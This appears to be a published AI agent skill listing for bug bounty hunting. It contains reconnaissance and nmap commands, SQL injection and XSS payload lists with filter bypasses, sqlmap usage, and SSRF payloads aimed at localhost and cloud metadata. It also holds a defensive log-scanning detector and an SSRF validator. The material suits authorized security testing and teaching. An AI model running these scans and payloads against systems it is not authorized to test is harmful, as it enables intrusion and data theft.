bug-bounty-program

Bug Bounty Program Specialist

Safety Notice

This listing is imported from skills.sh public index metadata. Review upstream SKILL.md and repository scripts before running.

Install skill "bug-bounty-program" with this command: npx skills add dengineproblem/agents-monorepo/dengineproblem-agents-monorepo-bug-bounty-program

An expert in vulnerability research and bug bounty hunting.

Testing Methodology

OWASP Top 10 Focus

  • Injection (SQL, NoSQL, LDAP, OS commands)

  • Broken Authentication

  • Sensitive Data Exposure

  • XML External Entities (XXE)

  • Broken Access Control

  • Security Misconfiguration

  • Cross-Site Scripting (XSS)

  • Insecure Deserialization

  • Using Components with Known Vulnerabilities

  • Insufficient Logging & Monitoring

Effort Distribution

  • Reconnaissance: 30%

  • Manual testing: 50%

  • Automated scanning: 20%

Reconnaissance

Subdomain Enumeration

Passive enumeration

amass enum -passive -d target.com -o subdomains.txt

Active enumeration

subfinder -d target.com -all -o subfinder.txt

DNS brute force

gobuster dns -d target.com -w wordlist.txt -o gobuster.txt

Merging results

cat subdomains.txt subfinder.txt gobuster.txt | sort -u > all_subs.txt

Technology Stack Identification

Wappalyzer CLI

wappalyzer https://target.com

WhatWeb

whatweb -a 3 https://target.com

Nuclei technology detection

nuclei -u https://target.com -t technologies/

Port Scanning

Fast scan

nmap -sS -sV -O -p- --min-rate 1000 target.com -oA nmap_full

Service scan

nmap -sC -sV -p 80,443,8080,8443 target.com -oA nmap_services

SQL Injection Testing

Manual Detection

-- Error-based
' OR '1'='1
' AND '1'='2
' UNION SELECT NULL--

-- Time-based blind
'; WAITFOR DELAY '00:00:05'--
' OR SLEEP(5)--

-- Boolean-based blind
' AND 1=1--
' AND 1=2--

SQLMap

Basic injection test

sqlmap -u "https://target.com/page?id=1" --batch

With authentication

sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123" --batch

POST data

sqlmap -u "https://target.com/login" --data="user=test&pass=test" --batch

Database enumeration

sqlmap -u "https://target.com/page?id=1" --dbs --batch
sqlmap -u "https://target.com/page?id=1" -D dbname --tables --batch

XSS Testing

Payload Types

// Reflected XSS
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

// DOM-based XSS
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>

// Bypass filters
<ScRiPt>alert('XSS')</ScRiPt>
<img src=x onerror="&#x61;lert('XSS')">
<svg/onload=alert('XSS')>

// Stored XSS via different contexts
"><script>alert('XSS')</script>
'-alert('XSS')-'
</title><script>alert('XSS')</script>

Context-Specific Payloads

// In HTML attribute
" onfocus=alert('XSS') autofocus="
' onfocus=alert('XSS') autofocus='

// In JavaScript string
';alert('XSS');//
"-alert('XSS')-"

// In URL parameter
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>
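The same payload families listed in the SQL Injection and XSS sections are what a defender's request-log review looks for. As an added detection example (not part of the SKILL.md), the scanner below URL-decodes the query string of each access-log line and tags the indicator classes the lists above contain: tautologies, UNION SELECT, time-delay functions, script tags, event handlers and script URIs. The signature names, the log format regex and the sample log are constructed for this example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Indicator classes derived from the payload lists above. These are coarse,
# noisy triage heuristics for request logs, not blocking rules.
SIGNATURES = [
    ("sqli_tautology",    r"'\s*(?:or|and)\s+'?\d'?\s*=\s*'?\d"),
    ("sqli_union",        r"\bunion\s+(?:all\s+)?select\b"),
    ("sqli_time_delay",   r"\b(?:sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s+delay\b"),
    ("xss_script_tag",    r"<\s*script\b"),
    ("xss_event_handler", r"\bon(?:error|load|focus|click|mouse\w+)\s*="),
    ("xss_script_uri",    r"\bjavascript\s*:|\bdata\s*:\s*text/html"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in SIGNATURES]
# Common Log Format: client address first, request line in quotes.
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_query(path, rounds=3):
    """URL-decode the query string repeatedly so double-encoded probes surface."""
    text = urlsplit(path).query
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan_access_log(log_text):
    """One record per flagged line: client, raw path and the indicator names hit."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, path = m.groups()
        query = decode_query(path)
        tags = [name for name, rx in COMPILED if rx.search(query)]
        if tags:
            hits.append({"client": client, "path": path, "tags": tags})
    return hits

# Constructed sample log: one benign request, then percent-encoded forms of
# the SQLi and XSS probes listed in this document.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /page?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /page?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /page?id=1%27%20UNION%20SELECT%20NULL-- HTTP/1.1" 500 120
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /page?id=1%27%20OR%20SLEEP(5)-- HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /search?q=%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1" 200 900
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /search?q=%3CScRiPt%3Ealert(1)%3C%2FScRiPt%3E HTTP/1.1" 200 900
10.0.0.7 - - [01/Jan/2024:10:00:07 +0000] "GET /go?u=javascript:alert(1) HTTP/1.1" 302 0
"""
```

Running `scan_access_log(SAMPLE_LOG)` flags six of the seven lines, one tag each, in the order the sections above list them; the benign first request produces nothing.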

SSRF Testing

Basic Payloads

Localhost bypass

http://127.0.0.1
http://localhost
http://[::1]
http://0.0.0.0
http://127.1
http://0177.0.0.1

Cloud metadata

http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/

Detection Methods

Out-of-band detection using Burp Collaborator

url = "http://your-collaborator-id.burpcollaborator.net"

Webhook.site for testing

url = "https://webhook.site/unique-id"
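The localhost shorthand forms listed above (127.1, 0177.0.0.1, [::1], 0.0.0.0) and the metadata hostnames are exactly what a string-match blocklist misses, because the HTTP client expands them only after the check has passed. As an added defender-side example, not part of the SKILL.md, the validator below expands inet_aton-style shorthand, octal and hex notation itself before classifying the address. DENIED_HOSTS and the function names are constructed for this example.

```python
import ipaddress
from urllib.parse import urlsplit

# Hostnames a server-side fetcher must never contact. Constructed for this
# example from the names listed on this page; extend it for your environment.
DENIED_HOSTS = {"localhost", "metadata.google.internal"}

def _parse_part(part):
    """Parse one dotted component the way inet_aton does: 0x.. hex, 0.. octal, else decimal."""
    if part.lower().startswith("0x"):
        return int(part, 16)
    if len(part) > 1 and part.startswith("0"):
        return int(part, 8)
    return int(part, 10)

def normalize_ipv4(host):
    """Expand inet_aton shorthand ('127.1', '0177.0.0.1', '2130706433') or return None."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    # inet_aton rule: the last component fills all remaining low-order bytes.
    widths = [8] * (len(values) - 1) + [32 - 8 * (len(values) - 1)]
    if any(v < 0 or v >= 1 << w for v, w in zip(values, widths)):
        return None
    packed = 0
    for v, w in zip(values, widths):
        packed = (packed << w) | v
    return ipaddress.IPv4Address(packed)

def is_blocked_destination(url):
    parts = urlsplit(url)
    host = parts.hostname  # IPv6 brackets stripped, lower-cased
    if parts.scheme not in ("http", "https") or not host or host in DENIED_HOSTS:
        return True
    try:
        addr = ipaddress.ip_address(host)        # canonical IPv4 or IPv6 literal
    except ValueError:
        addr = normalize_ipv4(host)              # shorthand, octal or hex IPv4
    if addr is None:
        # DNS name: in production resolve it, re-run this check on every answer,
        # and connect only to the vetted address (defeats DNS rebinding).
        return False
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped                  # ::ffff:127.0.0.1 is still loopback
    # is_global is False for loopback, private, link-local (169.254/16),
    # unspecified and reserved ranges; multicast is excluded explicitly.
    return not addr.is_global or addr.is_multicast
```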

Report Writing

Structure

Vulnerability Report

Summary

[One-line description]

Severity

[Critical/High/Medium/Low] - CVSS Score: X.X

Affected Component

[URL/Endpoint/Feature]

Description

[Detailed technical explanation]

Steps to Reproduce

  1. [Step 1]
  2. [Step 2]
  3. [Step 3]

Proof of Concept

[Screenshots, code, requests]

Impact

[Business/technical impact]

Remediation

[Specific recommendations]

References

[CVE, OWASP, etc.]

CVSS Calculator Factors

  • Attack Vector (AV): Network/Adjacent/Local/Physical

  • Attack Complexity (AC): Low/High

  • Privileges Required (PR): None/Low/High

  • User Interaction (UI): None/Required

  • Scope (S): Unchanged/Changed

  • Confidentiality Impact (C): None/Low/High

  • Integrity Impact (I): None/Low/High

  • Availability Impact (A): None/Low/High

Tools Checklist

Reconnaissance

  • Amass / Subfinder

  • Nmap

  • Shodan

  • Google Dorks

Web Testing

  • Burp Suite

  • OWASP ZAP

  • SQLMap

  • Nuclei

Automation

  • ffuf (fuzzing)

  • httpx (probing)

  • waybackurls

  • gau (URLs gathering)

Ethical Guidelines

  • Stay in scope: test only authorized targets

  • Don't be destructive: avoid DoS and data loss

  • Protect data: do not disseminate any data you find

  • Report responsibly: follow the disclosure policy

  • Document everything: keep detailed records

  • Respect rate limits: do not overload systems

Program Selection Strategy

Criteria

  • Response time history

  • Bounty amounts

  • Scope breadth

  • Program maturity

  • Community feedback

Priority Matrix

| Program Type | Skill Level  | Potential  |
|--------------|--------------|------------|
| New programs | Any          | High       |
| Broad scope  | Intermediate | Medium     |
| Narrow scope | Expert       | Low-Medium |
| VDP only     | Beginner     | Low        |
